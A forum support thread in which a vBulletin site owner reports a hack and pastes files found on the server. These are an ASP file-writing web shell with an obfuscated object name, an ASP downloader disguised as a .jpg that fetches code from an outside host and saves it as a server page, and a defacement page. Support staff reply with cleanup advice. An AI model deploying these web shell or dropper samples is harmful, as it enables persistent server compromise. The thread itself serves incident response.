xss.asp; ??

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Syxguns
    Senior Member
    • Aug 2011
    • 151
    • 4.2.X

    [Forum] xss.asp; ??

    My Wordpress / vBulletin 4 forum has been hacked. I found a lot of issues on the WP side of things, and I started combing through the files on vBulletin. I found xss.asp; which is a text document with the following code in it.

    Code:
    <%
    set fso = Server.CreateObject("Scripting.FileSystemObject")
    mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
    if session(myScriptName) = "" then
    for x = len(mapPath) to 0 step -1
    myScriptName = mid(mapPath,x)
    if instr(1,myScriptName,"\")>0 then
    myScriptName = mid(mapPath,x+1)
    x=0
    session(myScriptName) = myScriptName
    end if
    next
    Else
    myScriptName = session(myScriptName)
    end if
    %><%dim objfso%><%dim fdata%><%dim objcountfile%><%on error resume next%><%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%><%if trim(request("syfdpath"))<>"" then%><%fdata = request("cyfddata")%><%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%><%objcountfile.write fdata%><%if err =0 then%><%response.write "<font color=red>save success!</font>"%><%else%><%response.write "<font color=red>save unsuccess!</font>"%><%end if%><%err.clear%><%end if%><%objcountfile.close%><%set objcountfile=nothing%><%set objfso = nothing%><%response.write "<center><form action="" method=post>"%><%=server.mappath(request.servervariables("script_name"))%><%response.write "<br>"%><%response.write "<input type=text name=syfdpath width=32 size=50>"%><%response.write "<br>"%><%response.write "<textarea name=cyfddata cols=100 rows=10 width=32></textarea>"%><%response.write "<br>"%><%response.write "<input type=submit value=SAVE>"%><%response.write "</form></center>"%>
    I also found a file named zart.asp; which is a jpg file, but I can't open it in Dreamweaver, or Fireworks, but was able to open it with Notepad++.

    Code:
    <% Option Explicit
    Dim cOUT,scc,cURL,objXML,binXML,objADO
    scc = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
    cOUT = Left(scc,Len(scc) - 13)
    cURL = "http://hamyaran.sharif.edu/gallery/images/1.txt"
    Const cform = "Default.cs.aspx"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "GET", cURL , False
    objXML.Send
    binXML = objXML.ResponseBody
    Set objXML = Nothing
    Set objADO = server.CreateObject("ADODB.Stream")
    objADO.Type = 1
    objADO.Open
    objADO.Write binXML
    objADO.SaveToFile cOUT & cform,2
    Set objADO = Nothing
    Response.Write "downloaded."
    %>
    I'll follow this with the following files I found in the root of vB4:

    BBHH.html (I know is a hack file)
    site.php;.jpg
    zart.php;.jpg
    xss.asp;.txt
    teste.txt (code below)


    Code:
    <title>HackeD bY BLACK BURN (BBHH)</title>
    <body bgcolor = Black>
    <center><h1> <font color= red>HackeD bY BLACK BURN (BBHH)</font> </h1> </center>
    <hr >
    <br>
    <br>
    <center> <h3><font color= blue>We Show No Mercy,Take No Mercy:We Are Legends,We Are Sniper's,Be Ware - We Are Here - We Are Everywhere,Respect Us</font> </h3></center>
    <br>
    <center><img src = "http://i39.tinypic.com/24dlshg.jpg"></center>
    <br>
    <center><font color = red>GREETZ :- Xtor,Back Bone,Orion Hunter,cyb3r_gangst3r, K_5h3ll,N3opHyT3H4ck3r,RKHM00N,Gh0st KilL3r,Death WisheR,Z3RO,Whishper
    Death,cMshAcK,v0174g3,Sakib Sami And All Bangladesh Black Hat Hackers </font></center>
    <embed src="http://www.youtube.com/v/XYKUeZQbMF0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
    </body>
    </html>
    Okay, there may be more but I need to know if I can just delete the files, and if all of these files are hacked files. I see no mention of who the coder is on most of the files. What steps do I follow to clean my board? Many thanks for your assistance.

    BTW- admincp and modcp are not the names I used this thread for security: Secure your vB forum
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73976

    #2
    Not a vBulletin file. Looks like something whoever attacked your site left behind. We don't use any files named with an asp extension.

    You can run suspect file diagnostics under Maintenance -> Diagnostics to have vBulletin show you what files have been changed or don't belong.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • Syxguns
      Senior Member
      • Aug 2011
      • 151
      • 4.2.X

      #3
      Thanks you, I will run the diagnostics right away.

      Comment

      • Syxguns
        Senior Member
        • Aug 2011
        • 151
        • 4.2.X

        #4
        After an upgrade or installation, it is important that you delete the /install/ folder. This is necessary to provide proper security to your installation.
        An alternative would be to place the following within an .htaccess file in your /install/ folder:

        order deny,allow deny from all
        Thank you, I noticed this message after logging into my account. Do you have a link to any more security tips? I have renamed the admincp and modcp, I will now remove the install folder.

        Comment

        Related Topics

        Collapse

        Working...